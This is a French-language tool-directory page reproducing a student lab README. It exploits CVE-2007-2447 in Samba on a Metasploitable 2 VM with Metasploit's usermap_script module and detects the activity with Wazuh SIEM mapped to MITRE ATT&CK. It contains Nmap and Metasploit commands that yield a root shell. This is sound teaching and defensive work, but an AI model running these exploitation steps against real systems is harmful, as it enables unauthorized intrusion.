Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Labo d'attaque isolé AD/Linux : exploitation de CVE-2007-2447 via Metasploit, détection avec Wazuh SIEM mappé sur MITRE ATT&CK (T1190, T1059) | Kitploit
Outils/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
ReconnaissanceFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationTests d'IntrusionRenseignement sur les MenacesDétection d'IntrusionApprentissage et ÉducationAnalyse de Journaux

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Labs et Pratique
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Labo d'attaque isolé AD/Linux : exploitation de CVE-2007-2447 via Metasploit, détection avec Wazuh SIEM mappé sur MITRE ATT&CK (T1190, T1059)

Voir le dépôt
11il y a 27 joursPas encore vérifié
Partager

🛡️ Laboratoire d'exploitation de la CVE-2007-2447 et de détection SIEM (Wazuh + MITRE ATT&CK)

Projet B.Tech (BTP) | IIIT Pune Basé sur : « Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring » — ICCCNT 2023, IIT Delhi

Un laboratoire maison de cybersécurité entièrement fonctionnel, construit sur une seule machine à l'aide d'outils gratuits et open source. Le laboratoire simule un cycle d'attaque réel — Reconnaissance → Exploitation → Détection — et démontre comment un SIEM peut détecter les attaques et les cartographier en temps réel vers le framework MITRE ATT&CK.


📐 Architecture du laboratoire

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser
VMRôleIPOutils
Kali Linux 2026.1Attaquant10.0.0.1Nmap, Metasploit
Metasploitable 2Victime10.0.0.220+ vulnérabilités
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 Outils et technologies

OutilVersionRôle
VirtualBox7.xHyperviseur — exécute toutes les VM sur un seul hôte
Kali Linux2026.1OS de test d'intrusion (offensif)
Metasploitable 2v2.0Cible intentionnellement vulnérable
Wazuhv4.7.5SIEM open source (défensif)
NmapDernièreScan de réseau/ports
Metasploit FrameworkDernièreFramework d'exploitation

🔧 Guide d'installation

Prérequis

  • Une machine avec au moins 16 Go de RAM (les 3 VM tournent simultanément)
  • VirtualBox 7.x installé
  • ~50 Go d'espace disque libre

Étape 1 — Configuration réseau dans VirtualBox

Créez un réseau interne nommé cyberlab dans VirtualBox. Les trois VM utilisent cet adaptateur. La VM Ubuntu/Wazuh reçoit un adaptateur host-only supplémentaire afin que vous puissiez accéder au tableau de bord depuis votre navigateur.


Étape 2 — Kali Linux (Attaquant)

  1. Téléchargez l'image VirtualBox de Kali Linux
  2. Importez-la et assignez l'adaptateur réseau interne cyberlab
  3. Définissez une IP statique :
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Redémarrez le réseau : sudo systemctl restart networking

Étape 3 — Metasploitable 2 (Victime)

  1. Téléchargez Metasploitable 2
  2. Importez-le dans VirtualBox et assignez le réseau cyberlab
  3. Définissez une IP statique :
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ N'exposez jamais Metasploitable 2 sur Internet. Il est intentionnellement non sécurisé.


Étape 4 — Ubuntu + Wazuh SIEM (Défenseur)

  1. Installez Ubuntu Server 22.04
  2. Assignez deux adaptateurs : cyberlab interne + Host-Only
  3. Configurez une IP statique via netplan (/etc/netplan/01-network-manager-all.yaml) :
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Installez Wazuh (nœud unique) :
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Accédez au tableau de bord à l'adresse : https://192.168.56.103 (depuis le navigateur de l'hôte)

Étape 5 — Connecter Metasploitable à Wazuh via Syslog

Comme Metasploitable 2 ne peut pas exécuter d'agent Wazuh, configurez le transfert syslog pour une surveillance sans agent :

Sur Metasploitable, ajoutez dans /etc/rsyslog.conf :

root@kitploit:~
*.* @10.0.0.3:514

Sur Wazuh (Ubuntu), activez l'entrée syslog dans /var/ossec/etc/ossec.conf :

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Redémarrez Wazuh : sudo systemctl restart wazuh-manager


⚔️ Simulation d'attaque

Phase 1 — Reconnaissance (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Services clés découverts sur Metasploitable 2 :

PortServiceVersion
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3

Plus de 20 ports ouverts découverts. OS identifié : Linux 2.6.x


Phase 2 — Exploitation (Metasploit)

Vulnérabilité : CVE-2007-2447 — Injection de commande usermap_script dans Samba

Permet une exécution de code à distance sans authentification via des requêtes MS-RPC malformées sur Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

Phase 3 — Détection (Wazuh SIEM)

Après l'exploit, Wazuh a automatiquement détecté et cartographié les événements vers MITRE ATT&CK :

ID de règleDescriptionTechnique MITRETactique
5402sudo vers ROOT exécuté avec succèsT1548.003Élévation de privilèges
5501PAM : session de connexion ouverteT1078Accès initial / Persistance
5502PAM : session de connexion ferméeT1078Contournement de la défense
502Serveur Wazuh démarré—Détection active

Nombre total d'événements détectés : 55+

Accédez au tableau de bord à https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 Résultats clés

  • ✅ Cycle d'attaque complet reproduit avec succès dans un environnement isolé
  • ✅ CVE-2007-2447 a permis d'obtenir un shell root sans authentification en quelques secondes
  • ✅ Le SIEM Wazuh a détecté et cartographié toutes les attaques vers MITRE ATT&CK en temps réel
  • ✅ Le transfert syslog a permis une surveillance sans agent du système Metasploitable hérité
  • ✅ L'ensemble du laboratoire fonctionne sur une seule machine hôte avec 16 Go de RAM

📁 Structure du dépôt

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 Référence

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Avertissement

Ce laboratoire est entièrement construit sur des machines virtuelles isolées, sans accès Internet pendant les simulations d'attaque. Tous les outils et techniques sont utilisés strictement à des fins éducatives dans un environnement contrôlé. N'essayez pas de reproduire des techniques d'attaque sur des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.


Présenté par Harshita Verma | IIIT Pune

Télécharger l’outil